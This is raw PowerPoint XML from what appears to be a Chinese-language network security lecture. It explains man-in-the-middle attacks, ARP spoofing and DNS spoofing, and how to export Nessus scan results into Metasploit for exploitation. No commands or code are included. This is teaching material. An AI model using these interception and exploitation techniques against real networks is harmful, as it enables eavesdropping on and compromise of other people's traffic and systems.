                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Man-in-the-Middle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，简称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>MITM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击）是一种“间接”的入侵攻击。这种攻击模式是通过各种技术手段将入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间，这台计算机就称为“中间人”。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256442" y="1366181"/>
            <a:ext cx="4609524" cy="3409524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="159026" y="1120527"/>
            <a:ext cx="10972800" cy="9310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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>中间人攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275560" y="5034849"/>
            <a:ext cx="11063000" cy="1615827"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就是通过拦截正常的网络通信数据，并进行数据篡改和嗅探，而通信的双方却毫不知情。中间人攻击很早就成为了黑客常用的攻击手段。最典型的中间人攻击手段有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>欺骗、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>欺骗等技术。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29078407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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5802911" y="1487783"/>
          <a:ext cx="5789597" cy="3672408"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj name="Visio" r:id="rId3" imgW="4943475" imgH="3139216" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="4943475" imgH="3139216" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="5"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2911" y="1487783"/>
                        <a:ext cx="5789597" cy="3672408"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385970" y="2020870"/>
            <a:ext cx="5020650" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>欺骗并不是使网络无法正常通信，而是通过冒充网关或其它主机使得到达网关或主机的数据流通过攻击主机进行转发。通过转发流量可以对流量进行控制和查看，从而获取流量或得到机密信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="120926" y="954240"/>
            <a:ext cx="10972800" cy="9310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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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E319AA18-59A3-08DC-7E92-3431F2F5BDE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599" y="5295809"/>
            <a:ext cx="10972801" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之间通信时，如果主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存表中没有找到主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址，主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将会向整个局域网中的所有计算机发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>广播，广播后整个局域网中的计算机都会收到该数据。这时候，主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>说我是主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XX-XX-XX-XX-XX-XX,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>收到地址后就会重新更新自己的缓存表。当主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>再次与主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通信时，该数据将被发送给攻击主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上，主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>收到后再转发到主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189928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27512" y="969343"/>
            <a:ext cx="8229600" cy="847425"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>扫描漏洞和分析报告</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B11A57-2345-C75C-F5A1-7B5178B2CA20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="427512" y="1987119"/>
            <a:ext cx="11106047" cy="34512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28600" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial"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0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>当用户对目标主机扫描完成后，即可分析扫描结果，并从中获取到目标主机的漏洞信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002A51"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>为了方便用户对其它漏洞进行分析，可以将扫描结果导出到一个报告文件中。另外，用户还可以将该扫描报告导入到其它工具（如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>），进行利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>支持用户将扫描结果生成不同格式的报告。其中，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>支持导出的文件格式包括</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PDF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
